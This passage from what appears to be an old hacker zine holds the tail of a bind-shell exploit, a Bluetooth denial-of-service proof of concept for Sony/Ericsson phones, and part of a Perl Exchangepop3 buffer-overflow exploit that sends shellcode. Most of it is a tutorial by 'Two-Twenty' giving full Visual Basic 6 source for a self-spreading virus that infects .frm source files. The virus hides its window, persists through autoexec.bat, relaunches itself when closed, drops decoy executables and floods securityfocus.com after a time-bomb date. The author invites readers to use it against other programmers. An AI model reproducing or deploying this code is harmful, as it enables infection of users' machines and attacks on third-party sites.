continue; else { close(Sock); exit(-1); } } write(Sock, buffer, count); } if(FD_ISSET(Sock, &readfs)) { if((count = read(Sock, buffer, 1024)) <= 0) { if(errno == EWOULDBLOCK || errno == EAGAIN) continue; else { close(Sock); exit(-1); } } write(STDOUT, buffer, count); } } } } void fatal(char *ErrorMsg) { fprintf(stderr,"ERROR - %s\n\n",ErrorMsg); exit(1); } void Usage(char *Prog) { int i; fprintf(stderr, "Usage: %s 
-h hostname \n\n" "Options:\n\n" " -t target : Select the target\n" " -p portnumber : Sets a new port number \n" " -r bindport : Sets the port to bind a shell \n\n" "Targets:\n\n",Prog,DEFAULT_PORT,BIND_PORT); for(i=0;;i++) { if(Targets[i].Name != 0) fprintf(stderr," [%u] %s\n",i,Targets[i].Name); else break; } fprintf(stderr,"\n"); exit(1); } 007x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*007 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Bluetooth DoS . . . . . . . . . . . . . . . . . . . . . . . . . . Pierre Betouin . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 007x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*007 /* Sony/Ericsson reset display - PoC */ /* Pierre BETOUIN - pierre.betouin@infratech.fr */ /* 05-02-2006 */ /* Vulnerability found using BSS fuzzer : */ /* Download www.secuobs.com/news/05022006-bluetooth10.shml */ /* */ /* Causes anormal behaviours on some Sony/Ericsson */ /* cell phones */ /* Vulnerable tested devices : */ /* - K600i */ /* - V600i */ /* - K750i */ /* - W800i */ /* - And maybe other ones... */ /* */ /* Vulnerable devices will slowly turn their screen into */ /* black and then display a white screen. 
*/ /* After a short period (~45sec), they will go back to */ /* their normal behaviour */ /* */ /* gcc -lbluetooth reset_display_sonyericsson.c */ /* -o reset_display_sonyericsson */ /* ./reset_display_sonyericsson 00:12:EE:XX:XX:XX */ #include #include #include #include #include #include #include #include #define SIZE 4 #define FAKE_SIZE 1 // SIZE - 3 (3 bytes <=> L2CAP header) int main(int argc, char **argv) { char *buffer; l2cap_cmd_hdr *cmd; struct sockaddr_l2 addr; int sock, sent, i; if(argc < 2) { fprintf(stderr, "%s \n", argv[0]); exit(EXIT_FAILURE); } if ((sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0) { perror("socket"); exit(EXIT_FAILURE); } memset(&addr, 0, sizeof(addr)); addr.l2_family = AF_BLUETOOTH; if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) { perror("bind"); exit(EXIT_FAILURE); } str2ba(argv[1], &addr.l2_bdaddr); if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) { perror("connect"); exit(EXIT_FAILURE); } if(!(buffer = (char *) malloc ((int) SIZE + 1))) { perror("malloc"); exit(EXIT_FAILURE); } memset(buffer, 90, SIZE); cmd = (l2cap_cmd_hdr *) buffer; cmd->code = L2CAP_ECHO_REQ; cmd->ident = 1; cmd->len = FAKE_SIZE; if( (sent=send(sock, buffer, SIZE, 0)) >= 0) { printf("L2CAP packet sent (%d)\n", sent); } printf("Buffer:\t"); for(i=0; inew (Proto=>"tcp", PeerAddr=> "$ARGV[0]", PeerPort=>"25"); unless ($connect) { die "cant connect" } print "\nExchangepop3 v5.0 remote exploit by securma massine\n"; print "\n+++++++++++www.morx.org++++++++++++++++\n"; $connect->recv($text,128); print "$text\n"; $connect->send($mailf . $enter); $connect->recv($text,128); print "$text\n"; $connect->send($rcptt . $buffer . $ret . $buffer2 . $shellcode . $enter); print "\nsending exploit......\n\n"; print "\ntelnet to server port 9191 .........\n\n"; 011x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*011 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . MS Virus c0ding . . . . . . . . . 
. . . . . . . . . . . . . . . Two-Twenty . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 011x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*011 ____________________________________________________________ | | |-Guide to making source code viruses using MS Technologies-| |___________________________________________________________| By Two-Twenty _______________________ / \ | Hi. Call Me Harper, | | leader of the American | | revolution which will | | occur in Canada. | \___________ ________/ \ | ~---_ \ | / \ \| x \ | /, \_ _? {_ / {___.| 0 - ___---=== T0K ===---___ 0 - Table 0f Kontentz 1 - Intros 2 - Psudocode and notes 3 - Adding a back door 4 - Adding a payload 5 - Raw viral code 6 - Viral Code attached to working program (final product) 7 - Executing and spreading virus 8 - Outros 1 - ___---=== Intros ===---___ Hello. I am going to keep the commentary on this article short and sweet. This file is going to try to (re)introduce you to the lost art of source code viruses. If you hate any of the following you might enjoy this file: -Microsoft -People who like microsoft -Visual Basic 6.0 -People who like visual basic 6.0 -The open source scene -Full Disclosure of exploits and/or whitehats -Websites where you can upload your open source visual basic programs for others to use, study and enjoy and/or the people who use those sites. -People who like to use http://securityfocus.com to find exploits so they can prawn boxes because they cant make their own exploits. If you love any of the following you may enjoy this file: - Chaos/m4yh4m - Malware/Virus/Interesting Source Code - Ruining some one elses day - (D)DoSing http://securityfocus.com Chapter two is just an introduction to the code and how it will work. Chapter three is the details of how we will add a back door and what functions the back door will provide us. The back door part of the virus is optional, and is not needed, but I included it anyways. 
Chapter four is where I add a payload to the virus.

Chapter five is the raw virus code. It is the code as it would be if it were not attached to any other program. This part of the code can be used to infect other .frm files. I have included this because it makes the virus easier to study and understand.

Chapter six is the virus as it would be if attached to another program. Use the code in chapter six to attack computers as explained in chapter seven.

Do you know nothing about Visual Basic, programming, viruses or even computers? That's ok! I make it simple enough for any script toddler to use this virus source to attack other programmers' computers and take control of them! Just skip to chapter six, Executing and spreading virus.

Chapter seven ties up loose ends.

Please note that none of the code in this article is wrapped at 80 columns. This file is approx. 35 pages long while in notepad at a 1024x768 resolution.

A final note before reading on: I wrote all the code in VB 6.0 and tested it many times. To my knowledge this program does work, with logic and syntax errors minimal. Spelling and grammar errors are a different story though. I wrote this file for the technical aspect, not to get a good grade in English 101.

2 - ___---=== Pseudocode and Understanding this virus ===---___

Source code viruses were much more common in the early 90s. They are rarely seen any more except in old texts. Common source code viruses could be found written in Basic, C and even batch. Most of them were extremely simple viruses and did little more than write over other source code the virus found, destroying the program in the process.

This piece of code I have written does not destroy the source code that it infects and leaves the program functional, while still infecting other files in the background while the code runs as intended.

If you read the last k-1ine you might have read the article titled "Another Malware File" by Aftermath. This one is an extension of the file that Aftermath wrote.
In a nutshell, this virus finds .frm files, which are Visual Basic source files stored in plain text, and adds its own code to them. One thing Aftermath's virus did not do was spread without potentially destroying essential code in the original source code of the .frm file. This new improved virus does this. It also does a lot of things the original does not do.

The source code you are about to see is another source code virus, except instead of adding a bunch of text to the end of the .frm file, it adds two chunks of code at the beginning of the first two sub functions it finds. This code is a lot less prone to errors and a little less obvious to detect.

Here is an example of some high level VB pseudocode that is NOT yet infected (pretend you are reading the source code in notepad):

 ________________________________________________
|#form1.frm - Notepad                         _=X|
| ---------------------------------------------- |
|                                                |
|Subfunction Load Form()                         |
|                                                |
|  print in message box "hello, welcome!"        |
|                                                |
|End Subfunction                                 |
|                                                |
|                                                |
|Subfunction Unload Form()                       |
|                                                |
|  print in message box "goodbye!"               |
|                                                |
|End Subfunction                                 |
|                                                |
 ------------------------------------------------

Ok, so a regular application. Here is what it will look like when it's hit by this virus:

 ________________________________________________
|#form1.frm - Notepad                         _=X|
| ---------------------------------------------- |
|                                                |
|Subfunction Load Form()                         |
|                                                |
|  find original .frm file for the virus source  | <- virus source here (first part)
|  find .frm files and store them on computer    | <- virus source here (first part)
|  print in message box "hello, welcome!"        | <- original source
|                                                |
|End Subfunction                                 |
|                                                |
|                                                |
|Subfunction Unload Form()                       |
|                                                |
|  find functions in found frm files             | <- virus source here (second part/payload)
|  infect functions with virus source            | <- virus source here (second part/payload)
|  print in message box "goodbye!"               | <- original source
|                                                |
|End Subfunction                                 |
|                                                |
 ------------------------------------------------

Of course it's not that simple, but that's what it does. If there are more than two subfunctions it ignores the rest. It just finds the first two functions to infect. If there is only one function or no function, or even if the .frm file is empty for some reason, it does not infect. It will only infect if it finds the beginning and end of two functions.

I have tried to make the loops as tight and quickly executed as possible. Because this is a source code virus, the less code that is copied around, the quicker it executes.

If you are intent on studying this code then there might be a few built-in Visual Basic 6.0 functions you are unfamiliar with. I use this one function that is not often used: "FreeFile" returns the next free file number to use. When doing VB you can only have so many files open at once. I forget how many, but there is a limit. You can't use the same file number for two open files at the same time. For example, you can't do this:

    open "c:\autoexec.bat" for input as #1
    open "c:\config.sys" for binary read as #1

That's a big no-no. You will get errors. This code uses inputs and outputs, but because it's infecting already made code, we don't want to use #1 if file #1 is already in use. Instead we do this:

    dim x as integer
    x = FreeFile
    Open "C:\autoexec.bat" for input as #x

That works fine. If the code already opened up #1 and #2 and #3 and #4, x will be 5.

There is not too much more to say except I use lots of "Shell" functions. These allow commands to be fed into cmd.exe while allowing the VB program to continue to run without waiting for the command to finish executing.

If you need this code to run really fast, take out all of the comments (except for the markers!) and nice paragraph spacing. This will mean it will be harder to debug if something goes wrong, but it also means less code to copy around and quicker infection.
3 - ___---=== Adding a back door ===---___

Ok. I decided NOT to add a back door into this version of the virus. If you want to have a backdoor in your own virus then you can write one on your own.

It's not hard to write a back door into this virus. I would add it at the very end of the source as commented out text, then bring that text to a text file and compile it using vb6's command line compiler. Voila! Instant EXE back door. Use your n3njh4r skills to make it run at start up.

The tools I create are my own and no one else's. You should have this same philosophy. If you want to add a back door, make your own, and replace the included payload that I added. Doing this will be very simple because all you will have to do is replace my "payload" code with your backdoor code.

4 - ____---=== Adding a payload ===---___

Ok, so instead of adding a back door into this version of the virus, I decided instead to add a payload. What does the payload do, you might ask? It DoSs http://securityfocus.com by sending an http request from a socket.

Why security focus? Because they publish all the underground source codes.

When writing this virus I thought about putting in a very extensive bot that would connect to dalnet. This bot would respond to many commands such as DoS functions, proxy functions, keylogger functions, port scanner functions and a few other not so important functions. All of these would be controlled through IRC, creating a botnet.

After thinking about it for a while, I decided that this is unwise. Any dumbshit could place attacks on the Visual Basic open source community with my code that I so tediously wrote. This would put the bot code on high alert lists and shit. People would recognize it right away if I tried to use it for anything important, and there might even be "cleaning tools" written by the very security focus people that I despise. This would be double fold self destruction.

So instead I just included a small piece of code that will DoS that dumb site.
This is killing two birds with one stone. If anyone thinks it's cool to spread a virus, then security focus will be hit with lots of traffic, and the random script kiddy will be caught and put in jail where he will receive lots of action in the rear, while still allowing people who really want to learn about the dark side of coding to do so.

The DoS code I included simply compiles itself to an exe, buries itself in the \system32 file folder, and a line of code is written to autoexec.bat so it gets executed every time the computer starts. It will DoS that beiotch with all the sockets the computer can handle, essentially fuXoring up the computer that it is hosted on. This makes the computer obviously broken - so we do a time bomb.

Why a time bomb? Well, when we release it, we don't want the computers we are infecting to be fucked up right away - we want them to spread the virus around more. So say we release the virus on February 1st. This would give the virus a month to spread before it starts its payload, which will occur immediately after Valentine's Day.

I hate Valentine's Day. Hearts suck. In kindergarten we used to pass around hearts to all of our friends. I had the clever idea of passing around farts instead. My teacher called me a shithead. I never liked Valentine's Day after that.

So this gives it enough time to spread, but not too much time, because then a lot of people might find the executable, or even worse, a cleaner tool might be created to clean the virus traces. Remember, this is a source code virus that is sitting there in plain text. It's not hard to detect.

I used 2000 sockets per host to DoS the address. This may not look like a lot, but if the virus infects 10 computers, that's a potential 20000 connections. I additionally added 200 sockets to DoS port 22, which will fuck the admins around if they try to remotely fix the DoS attacks that are coming at them.

One last note before getting onto the payload source.
I added a few tricks that I learned over time that will help the prevention of shutting down the program. One of those tricks is in the sub function "Form_Terminate". When some one tries to shut down the program, the last thing the program will do before completly shutting down is call itself. This wont work 100% of the time, but it often does. Here is the source code for the DoS function. '----%<---- cut here----%<---- cut here----%<---- cut here----%<---- cut here----%<- VERSION 5.00 Object = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0"; "MSWINSCK.OCX" Begin VB.Form Form1 Caption = "Form1" ClientHeight = 465 ClientLeft = 1665 ClientTop = 1935 ClientWidth = 1560 Icon = "Form1.frx":0000 LinkTopic = "Form1" ScaleHeight = 465 ScaleWidth = 1560 Begin MSWinsockLib.Winsock Winsock1 Index = 0 Left = 0 Top = 0 _ExtentX = 741 _ExtentY = 741 _Version = 393216 End End Attribute VB_Name = "Form1" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Private Sub Form_Load() 'built in vb stealth functions Form1.Visible = False doevents App.TaskVisible = False 'time bomb.. must be March - December when it DoSs Dim strmonth As String strmonth = Mid(Date, 4, 2) If strmonth < 3 Then End Dim i As Integer Dim load_sockets As Boolean 'we only want to load the sockets once. 
If load_sockets = False Then For i = 1 To 2200 Load Winsock1(i) DoEvents load_sockets = True Next i End If '2000 sockets will DoS port 80 For i = 1 To 2000 Winsock1(i).RemoteHost = "http://securityfocus.com" Winsock1(i).RemotePort = "80" Winsock1(i).Close DoEvents Winsock1(i).Connect Next i '200 sockets will DoS port 22 For i = 2001 To 2200 Winsock1(i).RemoteHost = "http://securityfocus.com" Winsock1(i).RemotePort = "22" Winsock1(i).Close DoEvents Winsock1(i).Connect Next i End Sub Private Sub Form_Terminate() 'calling itself if some one tries to shut it down Shell ("cmd.exe /c " & App.Path & "\" & App.EXEName & ".exe") End Sub Private Sub Winsock1_Error(Index As Integer, ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean) 're-opening itself if it closes/times out Winsock1(Index).Close Winsock1(Index).Connect DoEvents End Sub '----%<---- cut here----%<---- cut here----%<---- cut here----%<---- cut here----%<- This is just a simple port flooder. Alone it wont do anything, but after a lot of computers are infected then this has the potential to take the website off the intranet, atleast for a while. Later I will explain how this code will be taken from source code and compiled into an exe. 5 - ___---=== Raw viral code ===---___ Here is the virus code that can be used to infect a bunch of other .frm files It is in three sub functions, and includes option explicit. The main reason I have included option explicit is because there is a possibility that the file it will infect also has option explicit enabled. This just helps testing the virus to make sure that we dont accidentaly use a variable that hasnt been delclared. To infect other .frm files with this launch code, execute the first sub fucntion (sub1()), then stop the program (or create a delay that lasts around 4-5 seconds) then execute sub2() sub function. 
Obviously, visual basic studio 6.0 will be needed. '--- %< ---cut-here------ %< ---cut-here------ %< ---cut-here------ %< ---cut-here---' Option Explicit Private Sub sub1() 'faqchew App.TaskVisible = False Dim line1, checkstatus1, lineput As String Dim i, importantvariable As Integer Dim j As Double Dim freefile1, freefile2, freefile3 As Integer Shell ("cmd.exe /c cd " & App.Path & " && dir /b > " & Mid(App.Path, 1, 3) & "C0NFIG.sys"), vbHide If Dir(Mid(App.Path, 1, 3) & "Documents and Settings") <> "" Then Shell ("cmd.exe /c cd " & Mid(App.Path, 1, 3) & "Documents and Settings && dir /b /s >> " & Mid(App.Path, 1, 3) & "MSD0S.sys"), vbHide Else Shell ("cmd.exe /c cd " & Mid(App.Path, 1, 3) & "Program Files && dir /b /s >> " & Mid(App.Path, 1, 3) & "MSD0S.SYS"), vbHide End If DoEvents redo1: importantvariable = importantvariable + 1 j = Timer j = j + 2 Do Until Timer >= j Loop 'use this instead of gay timer!!!! 'Do ' DoEvents 'Loop Until Mid(App.Path, 1, 3) & "drives.sys" <> "" If Dir(Mid(App.Path, 1, 3) & "C0NFIG.sys") = "" Then If importantvariable >= 3 Then GoTo skip1 GoTo redo1 End If freefile1 = FreeFile Open Mid(App.Path, 1, 3) & "C0NFIG.sys" For Input As #freefile1 DoEvents Do Until EOF(freefile1) DoEvents Line Input #freefile1, line1 DoEvents line1 = UCase(line1) If Right$(line1, 4) = ".FRM" Then freefile2 = FreeFile Open line1 For Input As #freefile2 Do Until EOF(freefile2) Line Input #freefile2, checkstatus1 DoEvents Dim EOInfect As Boolean DoEvents If checkstatus1 = "'faqchew" Then freefile3 = FreeFile Open Mid(App.Path, 1, 3) & "B00T.INI" For Append As #freefile3 Do Until EOInfect = True Print #freefile3, checkstatus1 If checkstatus1 = "'faqchew2" Then EOInfect = True Line Input #freefile2, checkstatus1 Loop EOInfect = False Close #freefile3 End If DoEvents If checkstatus1 = "'fakmeh" Then freefile3 = FreeFile Open Mid(App.Path, 1, 3) & "AUT0EXEC.BAT" For Append As #freefile3 Do Until EOInfect = True Print #freefile3, checkstatus1 If checkstatus1 = "'teh 
endg" Then EOInfect = True Line Input #freefile2, checkstatus1 Loop EOInfect = False Close #freefile3 End If DoEvents 'payload part one If InStr(1, checkstatus1, "non disclosure revolution", vbTextCompare) Then 'MsgBox checkstatus1 freefile3 = FreeFile Open Mid(App.Path, 1, 3) & "I0.SYS" For Append As #freefile3 Do Until EOInfect = True Print #freefile3, checkstatus1 If checkstatus1 = "' fuck full disclosure. '" Then EOInfect = True Line Input #freefile2, checkstatus1 Loop EOInfect = False Print #freefile3, vbCrLf Close #freefile3 End If DoEvents If InStr(1, checkstatus1, "'theres nothing left for me to hide", vbTextCompare) Then freefile3 = FreeFile Open Mid(App.Path, 1, 3) & "systemProj1.vbp" For Append As #freefile3 Do Until EOInfect = True Print #freefile3, checkstatus1 If checkstatus1 = "'-NIN 2005" Then EOInfect = True Line Input #freefile2, checkstatus1 Loop EOInfect = False Print #freefile3, vbCrLf Close #freefile3 End If DoEvents DoEvents Loop Close #freefile2 End If Loop Close #freefile1 Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "C0NFIG.sys"), vbHide skip1: 'faqchew2 End Sub Private Sub sub2() 'fakmeh Dim IntArray(0 To 4), i As Integer Dim line_string, lineput As String Dim j As Double Dim freefile9, freefile2, freefile4, freefile5, freefile6 As Integer Dim exit_thing As Boolean If Dir(Mid(App.Path, 1, 3) & "MSD0S.sys") = "" Then GoTo skip2 freefile9 = FreeFile Open Mid(App.Path, 1, 3) & "MSD0S.sys" For Input As #freefile9 Do Until EOF(freefile9) skip_infect: Input #freefile9, lineput lineput = UCase(lineput) If Right$(lineput, 4) = ".FRM" Then ''debug'' 'MsgBox "lineput = " & lineput freefile2 = FreeFile exit_thing = False Open lineput For Input As #freefile2 Do Until EOF(freefile2) Or exit_thing = True Line Input #freefile2, line_string If InStr(1, line_string, "faqchew", vbTextCompare) <> 0 Then exit_thing = True End If Loop Close freefile2 If exit_thing = True Then GoTo skip_infect End If freefile2 = FreeFile Open lineput For Input As 
#freefile2 For i = 0 To 4 IntArray(i) = 0 Next i Do Until EOF(freefile2) Or IntArray(3) <> 0 Or IntArray(4) <> 0 Line Input #freefile2, line_string IntArray(0) = IntArray(0) + 1 If InStr(1, line_string, "Function", vbTextCompare) <> 0 Or InStr(1, line_string, "Sub", vbTextCompare) <> 0 Then If InStr(1, line_string, "Declare", vbTextCompare) = 0 And InStr(1, line_string, "Const", vbTextCompare) = 0 And InStr(1, line_string, ")", vbTextCompare) <> 0 And InStr(1, line_string, "(", vbTextCompare) <> 0 And InStr(1, line_string, "End ", vbTextCompare) = 0 And InStr(1, line_string, Chr(34), vbTextCompare) = 0 And InStr(1, line_string, "Exit Function", vbTextCompare) = 0 And InStr(1, line_string, "=", vbTextCompare) = 0 And InStr(1, line_string, "'", vbTextCompare) = 0 Then If IntArray(1) = 0 Then IntArray(1) = IntArray(0) Else IntArray(3) = IntArray(0) End If End If End If If InStr(1, line_string, "End Sub") <> 0 Or InStr(1, line_string, "End Function") <> 0 Then If IntArray(2) = 0 Then IntArray(2) = IntArray(0) Else IntArray(4) = IntArray(0) End If End If DoEvents Loop Close #freefile2 DoEvents freefile4 = FreeFile Open Mid(App.Path, 1, 3) & "newfile.txt" For Output As #freefile4 freefile5 = FreeFile Open lineput For Input As #freefile5 For i = 0 To IntArray(1) - 1 Line Input #freefile5, line_string Print #freefile4, line_string DoEvents Next i freefile6 = FreeFile Open Mid(App.Path, 1, 3) & "B00T.INI" For Input As #freefile6 Do Until EOF(freefile6) Line Input #freefile6, line_string Print #freefile4, line_string DoEvents Loop Close #freefile6 DoEvents For i = i To IntArray(3) - 1 Line Input #freefile5, line_string Print #freefile4, line_string DoEvents Next i DoEvents freefile6 = FreeFile Open Mid(App.Path, 1, 3) & "AUT0EXEC.BAT" For Input As #freefile6 Do Until EOF(freefile6) Line Input #freefile6, line_string Print #freefile4, line_string DoEvents Loop Close #freefile6 DoEvents Do Until EOF(freefile5) Line Input #freefile5, line_string Print #freefile4, line_string 
DoEvents Loop '''''''''''''''' Dim freefilefuck As Integer freefilefuck = FreeFile Open Mid(App.Path, 1, 3) & "I0.SYS" For Input As #freefilefuck Do Until EOF(freefilefuck) Line Input #freefilefuck, line_string Print #freefile4, line_string DoEvents Loop Close #freefilefuck DoEvents freefilefuck = FreeFile Open Mid(App.Path, 1, 3) & "systemProj1.vbp" For Input As #freefilefuck Do Until EOF(freefilefuck) Line Input #freefilefuck, line_string Print #freefile4, line_string DoEvents Loop Close #freefilefuck DoEvents '''''''' Close #freefile5 Close #freefile4 On Error Resume Next FileCopy Mid(App.Path, 1, 3) & "newfile.txt", lineput DoEvents Kill Mid(App.Path, 1, 3) & "newfile.txt" End If DoEvents Loop Close #freefile9 DoEvents 'FINALY.. what we do here is create the EXE of the payload, then we 'get the FUCK out of town like real dawgz. '.VBP file Dim freefilefuck1 As Integer freefile9 = FreeFile Open Mid(App.Path, 1, 3) & "systemProj1.vbp" For Input As #freefile9 DoEvents freefilefuck1 = FreeFile Open Mid(App.Path, 1, 3) & "Project1.vbp" For Output As #freefilefuck1 Dim g_string As Integer For g_string = 1 To 7 Line Input #freefile9, line_string Next g_string Do Until line_string = "'see the animial in his cage that you built" Line Input #freefile9, line_string If InStr(1, line_string, "in his cage", vbTextCompare) = 0 Then Print #freefilefuck1, Mid(line_string, 2) End If DoEvents Loop Close #freefilefuck1 DoEvents Close #freefile9 DoEvents '.FRM file Open Mid(App.Path, 1, 3) & "I0.SYS" For Input As #freefile9 DoEvents freefilefuck1 = FreeFile Open Mid(App.Path, 1, 3) & "Form1.frm" For Output As #freefilefuck1 Line Input #freefile9, line_string Do Until EOF(freefile9) Line Input #freefile9, line_string If InStr(1, line_string, "fuck full disclosure.", vbTextCompare) = 0 Then Print #freefilefuck1, Mid(line_string, 2) End If DoEvents Loop Close #freefilefuck1 DoEvents Close #freefile9 DoEvents Dim freefilefuck2 As Integer freefilefuck2 = FreeFile Open Mid(App.Path, 1, 3) 
& "form1.vbw" For Output As #freefilefuck2 Print #freefilefuck2, "Form1 = 130, 129, 577, 679, , 0, 0, 0, 0, C" & vbCr Close #freefilefuck2 DoEvents 'now we use the vb6.exe compiler to compile the payload into an exe.. we do it STEALTHY like 'no obvious activity going on.. Shell ("cmd.exe /c cd " & Mid(App.Path, 1, 3) & " && cd Program Files\Microsoft Visual Studio\VB98 && vb6.exe /m " & Mid(App.Path, 1, 3) & "project1.vbp " & Mid(App.Path, 1, 3) & "Program Files\FileAloc100.exe"), vbHide DoEvents Shell ("cmd.exe /c cd " & Mid(App.Path, 1, 3) & " && cd Program Files\Microsoft Visual Studio\VB98 && vb6.exe /m " & Mid(App.Path, 1, 3) & "project1.vbp " & Mid(App.Path, 1, 3) & "Documents and Settings\All Users\Documents\My Music\HotMusic.exe"), vbHide Shell ("cmd.exe /c cd " & Mid(App.Path, 1, 3) & " && cd Program Files\Microsoft Visual Studio\VB98 && vb6.exe /m " & Mid(App.Path, 1, 3) & "project1.vbp " & Mid(App.Path, 1, 3) & "My Downloads\SEXY_BODY.exe"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "MSD0S.sys"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "AUT0EXEC.BAT"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "B00T.INI"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "newfile.txt"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "systemProj1.vbp"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "Form1.frm"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "project1.vbp"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "form1.vbw"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "I0.SYS"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "project1.vbp"), vbHide DoEvents App.TaskVisible = True Dim freefilefuck3 As Integer freefilefuck3 = FreeFile Open Mid(App.Path, 1, 3) & "autoexec.bat" For Append As #freefilefuck3 Print #freefilefuck3, Mid(App.Path, 1, 3) & "program files\FileAloc100.exe" Close #freefilefuck3 DoEvents skip2: 'light that burns twice as bright burns 
half as long 'teh endg End Sub Private Sub Form_Load() 'use these to test and infect Call sub1 'Call Sub2 End Sub ' Support the non disclosure revolution! ' 'VERSION 5.00 'Object = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0"; "MSWINSCK.OCX" 'Begin VB.Form Form1 ' Caption = "Form1" ' ClientHeight = 465 ' ClientLeft = 1665 ' ClientTop = 1935 ' ClientWidth = 1560 ' LinkTopic = "Form1" ' ScaleHeight = 465 ' ScaleWidth = 1560 ' Begin MSWinsockLib.Winsock Winsock1 ' Index = 0 ' Left = 0 ' Top = 0 ' _ExtentX = 741 ' _ExtentY = 741 ' _Version = 393216 ' End 'End 'Attribute VB_Name = "Form1" 'Attribute VB_GlobalNameSpace = False 'Attribute VB_Creatable = False 'Attribute VB_PredeclaredId = True 'Attribute VB_Exposed = False 'Private Sub Form_Load() ' ' ''built in vb stealth functions 'Form1.Visible = False 'App.TaskVisible = False ' ''time bomb.. must be March - December when it DoSs 'Dim strmonth As String 'strmonth = Mid(Date, 4, 2) 'If strmonth < 3 Then End ' 'Dim i As Integer 'Dim load_sockets As Boolean ' ''we only want to load the sockets once. 
'If load_sockets = False Then ' For i = 1 To 2200 ' Load Winsock1(i) ' DoEvents ' load_sockets = True ' Next i 'End If ' ''2000 sockets will DoS port 80 'For i = 1 To 2000 ' Winsock1(i).RemoteHost = "http://securityfocus.com" ' Winsock1(i).RemotePort = "80" ' Winsock1(i).Close ' DoEvents ' Winsock1(i).Connect 'Next i ' ' ''200 sockets will DoS port 22 'For i = 2001 To 2200 ' Winsock1(i).RemoteHost = "http://securityfocus.com" ' Winsock1(i).RemotePort = "22" ' Winsock1(i).Close ' DoEvents ' Winsock1(i).Connect 'Next i ' 'End Sub ' 'Private Sub Form_Terminate() ''anit-shutdown teqnique 'Shell ("cmd.exe /c " & App.Path & "\" & App.EXEName & ".exe"), vbHide 'End Sub ' 'Private Sub Winsock1_Error(Index As Integer, ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean) ''reconnecting 'Winsock1(Index).Close 'Winsock1(Index).Connect 'End Sub ' fuck full disclosure. ' 'theres nothing left for me to hide 'i lost my ignoracne security and pride 'im all alone in this world you must dispise 'i believed your promices - your promices are lies 'terrable lies '-NIN 1998 'Type=Exe 'Form=Form1.frm 'Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\..\WINDOWS\system32\stdole2.tlb#OLE Automation 'Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; MSWINSCK.OCX 'IconForm="Form1" 'Startup="Form1" 'HelpFile="" 'Title="SysFunc" 'ExeName32="SysFunc.exe" 'Path32="..\..\.." 
'Command32="" 'Name="SysFunc" 'HelpContextID="0" 'Description="Alocation Tool" 'CompatibleMode="0" 'MajorVer=1 'MinorVer=0 'RevisionVer=2 'AutoIncrementVer=1 'ServerSupportFiles=0 'VersionCompanyName="Microsoft" 'VersionFileDescription="File System Alocation tool" 'VersionLegalCopyright="Copyright 2001" 'VersionProductName="SysFunc Alocation Tool" 'CompilationType=0 'OptimizationType=0 'FavorPentiumPro(tm)=0 'CodeViewDebugInfo=0 'NoAliasing=0 'BoundsCheck=0 'OverflowCheck=0 'FlPointCheck=0 'FDIVCheck=0 'UnroundedFP=0 'StartMode=0 'Unattended=0 'Retained=0 'ThreadPerObject=0 'MaxNumberOfThreads=1 'DebugStartupOption=0 ' '[MS Transaction Server] 'AutoRefresh=1 'see the animial in his cage that you built 'are you sure what side you're on 'better not look in to closely to the eyes 'are you sure what side the glass you are on 'see the safety of the life you have built 'everything where it belongs 'feel the hollowness inside of your heart 'and its all right where it belongs 'what if everything around you 'isn't quite as it seams 'what if all the world you think you know 'is an elaborate dream 'and if you look right at your reflection 'is it all you want to be 'but if you could look right through the cracks 'would you find yourself - 'find yourself afraid to see '- 'what if all the world's inside of your head 'just creations of your own 'the devils and the gods. all the living and the dead 'and you really aught to know 'you can live this illusion 'you can choose to believe 'you could keep looking but cant find the words 'now your hidng in the trees 'what if everything around you 'isnt quite as it seams 'what if all the world you used to know 'is an elaborate dream? 'and if you look at your reflection 'is it all you want to be? 'what if you could look right through the cracks 'would you find yourself - 'find yourself afraid to see? 
